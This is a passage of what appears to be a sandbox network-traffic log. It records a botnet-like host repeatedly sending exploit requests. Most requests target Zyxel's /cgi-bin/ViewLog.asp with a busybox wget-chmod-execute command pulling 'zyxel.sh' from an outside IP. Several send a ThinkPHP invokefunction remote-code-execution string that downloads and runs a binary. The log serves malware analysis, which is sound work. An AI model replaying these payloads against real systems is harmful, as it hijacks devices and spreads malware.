3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        782192.168.2.145056895.213.242.928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.184860945 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        783192.168.2.145202695.86.120.1248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.210588932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        784192.168.2.145470694.131.64.1548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.295310020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.414304018 CET1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:34:46 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3560
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ezproxies.com
                                                        X-Cache-Lookup: NONE from ezproxies.com:8080
                                                        Via: 1.1 ezproxies.com (squid/3.5.20)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        785192.168.2.145707631.211.236.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.398083925 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        786192.168.2.145803694.67.96.08080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.417747021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.680059910 CET498INHTTP/1.1 401 Unauthorized
                                                        WWW-Authenticate: Basic realm="Protected"
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4b 73 65 6e 69 61 20 4c 61 72 65 73 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 73 65 6e 69 61 73 65 63 75 72 69 74 79 2e 63 6f 6d 2f 22 20 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 66 66 33 33 33 33 3e 20 4b 73 65 6e 69 61 20 53 65 63 75 72 69 74 79 20 3c 2f 66 6f 6e 74 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Ksenia Lares WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 <a href="http://www.kseniasecurity.com/" ><font color=#ff3333> Ksenia Security </font></a></div></div></font></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        787192.168.2.143787294.120.244.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.423768997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        788192.168.2.145637894.121.214.1878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.424529076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        789192.168.2.144380494.110.12.848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.599498987 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        790192.168.2.143322662.238.136.998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.602953911 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        791192.168.2.145138494.67.82.958080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.646050930 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        792192.168.2.144077094.121.79.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.664233923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        793192.168.2.144086662.29.67.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.671910048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        794192.168.2.145113694.120.48.1998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:46.674340963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        795192.168.2.143324662.238.136.998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:47.033938885 CET380INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Server: httpd
                                                        Date: Wed, 14 Feb 2024 09:34:40 GMT
                                                        Connection: close
                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                        Cache-Control: post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        796192.168.2.143636631.22.116.848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.050846100 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        797192.168.2.1437620112.164.81.6980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.061969995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.380609989 CET77INHTTP/1.1 400 Bad Request
                                                        Server: Web Server
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        798192.168.2.1440520112.156.178.11680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.084779024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.466911077 CET243INHTTP/1.0 404 Not Found
                                                        Content-type: text/html
                                                        Date: Wed, 14 Feb 2024 08:34:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL was not found</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        799192.168.2.1454556112.65.208.680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.093292952 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.408070087 CET103INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        800192.168.2.1450376112.207.118.15380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:48.108926058 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:48.438745022 CET35INHTTP/1.0 302 Redirect
                                                        Feb 14, 2024 09:34:48.438760042 CET44INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 36 3a 33 34 3a 35 31 20 32 30 32 34 0d 0a
                                                        Data Ascii: Date: Wed Feb 14 16:34:51 2024
                                                        Feb 14, 2024 09:34:48.439671040 CET82INData Raw: 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                        Data Ascii: Pragma: no-cacheCache-Control: no-cache, no-store, must-revalidate
                                                        Feb 14, 2024 09:34:48.439685106 CET37INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a
                                                        Data Ascii: Content-Type: text/html
